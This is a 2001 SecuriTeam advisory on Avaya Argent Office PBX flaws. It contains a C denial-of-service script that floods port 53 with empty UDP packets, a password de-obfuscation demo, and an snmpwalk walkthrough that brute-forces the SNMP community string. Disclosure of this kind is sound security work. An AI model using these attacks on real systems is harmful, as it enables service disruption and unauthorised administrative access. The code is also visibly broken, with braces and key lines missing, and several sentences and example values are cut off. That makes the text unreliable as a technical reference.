[NEWS] Multiple Vulnerabilities in Avaya Argent Office

From: support@securiteam.com
Date: 08/09/01

From: support@securiteam.com
To: list@securiteam.com
Subject: [NEWS] Multiple Vulnerabilities in Avaya Argent Office
Message-Id: <20010809040059.896A9138C4@mail.der-keiler.de>
Date: Thu,  9 Aug 2001 06:00:59 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Multiple Vulnerabilities in Avaya Argent Office


The <http://wwwdb.avaya.com/pls/bcs/solutions.main?p_id=66> ArgentOffice
branch of products (now known as Network Alchemy line) from
<http://www.avaya.com> Avaya are a solution integrating a PBX, network
connectivity, dial on demand networking and more. The product contains
multiple security vulnerabilities that allow attackers to cause the
program to no logger provide service, gain elevated privileges and modify
the current configuration of the product. All of these security
vulnerabilities are only possible on a local network (this system is
designed for small offices), so they should not be much of a problem, but
still these might pose a problem in some originations or configurations.


1. Local denial of service:
By sending a UDP packet to port 53 with no payload cause the Argent Office
to reboot. The unit gets up very quickly, so in order to cause a denial of
service one needs to send a large amount of packets repeatedly.

/* argent_kill.c
(c) 2001 Jacek Lipkowski sq5bpf@acid.ch.pw.edu.pl
Reboots an Argent Office box by sending udp packets with no payload to
port 53
usage: argent_kill ip_address

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

main(int argc, char *argv[])
struct sockaddr_in addr;
struct hostent *host;
int s;

if (s==-1) { perror("socket()"); exit(1); }
if (host==0) { herror("gethostbyname"); exit(1); }
if (connect(s,&addr,16)==-1) { perror("connect()"); exit(1); }
for (;;)
send(s,0,0,0); sleep(1); printf("."); fflush(stdout);

2. Easily decryptable configuration password
Configuring Argent Office consists of a strange TFTP look-alike. For
example to reboot a unit, one must get via TFTP the following file:

Where 00e007002666 is the MAC address of the unit and password is the
obfuscated password. Since this packet is easily sniffed and the
obfuscation algorithm does not change, anyone with a sniffer can easily
obtain administrative privileges. The obfuscation mechanism is rather
simple, as the following example demonstrates:

/* argent_obfuscate.c
(c) 2001 Jacek Lipkowski sq5bpf@acid.ch.pw.edu.pl
Demonstrates how the password obfuscation mechanism works in argent office
products */

main(int argc,char **argv)
int i;
unsigned char buf[32];
for (i=0;i<strlen(argv[1]);i++)
printf("0x%2.2X ",buf[i]+0x11-i);

Show the hex values for the password 'idiocy':

~$ ./argent_obfuscate idiocy
0x7A 0x74 0x78 0x7D 0x70 0x85

3. SNMP handling
The software does SNMP authentication via something similar to:
 if (strncmp(n,c,strlen(n))==0) { ok, valid community}

Where c is the community string and n is the community string from the

So if the size of the password in the packet is 0 then the authentication
is always ok.

~$ snmpwalk "" system.sysDescr.0
system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)

This would allow you to guess the community string character by character.

For guessing the first letter:
~$ snmpwalk a system.sysDescr.0
Timeout: No Response from
[the first letter is not a]
[several combinations later, is it p?]
~$ snmpwalk p system.sysDescr.0
system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)

[ok we have the first letter, lets go for the second]
~$ snmpwalk pa system.sysDescr.0
Timeout: No Response from
[the second letter is not a]
[several combinations later, is it r?]
~$ snmpwalk pr system.sysDescr.0
system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)

After a small amount of combinations we find out that, the community is

While not much is gained by using SNMP, the community may be some company
standard, and knowing it may open other doors.

4. Broadcast TFTP requests
The system in its default configuration requests a file called HoldMusic
via TFTP to the broadcast address. You could serve this file and change
your company's music on hold tune to something else.


The information has been provided by <mailto:sq5bpf@rock.andra.com.pl>
Jacek Lipkowski.


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.